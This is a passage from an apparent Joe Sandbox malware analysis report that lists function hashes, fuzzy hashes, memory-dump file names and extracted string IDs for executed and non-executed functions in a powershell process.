                                                              • Opcode Fuzzy Hash: 225d1da324f65fe7591ca912a295fc0dd8d5a7e2c1601511b5886c3cfebe7443
                                                              • Instruction Fuzzy Hash: A111E7B8A012099FCB00CF9DD580AAABBB5FF89310B158565E809AB351D731FD41CBA1
                                                              Function 0300D01D Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2786774160.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_300d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: afefd6cc59f3bb7b1af086f12085e2b364d217a9a9e2c66521cd5fd5b0a4b8f0
                                                              • Instruction ID: 59ac86a437734146d24e0cbb88420d66be2db40d4827e6ce174de79e60b610ba
                                                              • Opcode Fuzzy Hash: afefd6cc59f3bb7b1af086f12085e2b364d217a9a9e2c66521cd5fd5b0a4b8f0
                                                              • Instruction Fuzzy Hash: 1D01F7714063409AF720CA55CA84B67FFDCEF45320F1CC469ED4C0A2C6C6799841C6B1
                                                              Function 0300D007 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2786774160.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_300d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 638e87c0bcd3a4cb0c8d75eb8a16d2d6c9aaafda44f68562c098c2228cbba39f
                                                              • Instruction ID: 5a591991366b64ab7f79c7a73fa0dd6fbc1efe351ed07527c1a0261035cd8d74
                                                              • Opcode Fuzzy Hash: 638e87c0bcd3a4cb0c8d75eb8a16d2d6c9aaafda44f68562c098c2228cbba39f
                                                              • Instruction Fuzzy Hash: EA01407240E3C09EE7128B25C994B52BFB8EF47224F1D81DBD9888F2A3C2695845D772

                                                              Non-executed Functions

                                                              Function 07630DF8 Relevance: 9.2, Strings: 7, Instructions: 496COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2788681772.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_7630000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                              • API String ID: 0-108373575
                                                              • Opcode ID: 586c67c51f076f573417ec22dfeaad4cbcc526c4c521cb01830985e951e50bef
                                                              • Instruction ID: 9d95be6d29d0c50fb006e18029efbb92c3186447fb7737c1531a8b6556743e1e
                                                              • Opcode Fuzzy Hash: 586c67c51f076f573417ec22dfeaad4cbcc526c4c521cb01830985e951e50bef
                                                              • Instruction Fuzzy Hash: 20F159B1B04209CFCB299B7888006AABBE6EFC6310F14857AD946DF751DB35C946C7A1
                                                              Function 07630148 Relevance: 9.1, Strings: 7, Instructions: 328COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2788681772.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_7630000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                              • API String ID: 0-108373575
                                                              • Opcode ID: 0f34e0632c2b8654848fb7f180d8ab83214fcd04b109ff0f097157ccbd5da625
                                                              • Instruction ID: 0e15d857b170b6c3052b03dee46912f7248228ded4270c5e2b4fd648219ce530
                                                              • Opcode Fuzzy Hash: 0f34e0632c2b8654848fb7f180d8ab83214fcd04b109ff0f097157ccbd5da625
                                                              • Instruction Fuzzy Hash: 69A19AB27083169FD7254B78981067ABBF6DFC6610F18847BC886CB352DA35CD4AC3A1
                                                              Function 07632C10 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2788681772.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_7630000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $]q$$]q$$]q$$]q
                                                              • API String ID: 0-858218434
                                                              • Opcode ID: 50cd979784af450f44190bbf9c0a937c602dd6c2c361463aabf88843f7e60e00
                                                              • Instruction ID: 8b0f7e8a2943a05a848c6a30755d8e9382396e8dfc68fe7118f8ae5a8ceb33f7
                                                              • Opcode Fuzzy Hash: 50cd979784af450f44190bbf9c0a937c602dd6c2c361463aabf88843f7e60e00
                                                              • Instruction Fuzzy Hash: EC2107B13103065FDB78557D8860B27BADABBD5715F24882AA94ECB381DE35C842CB61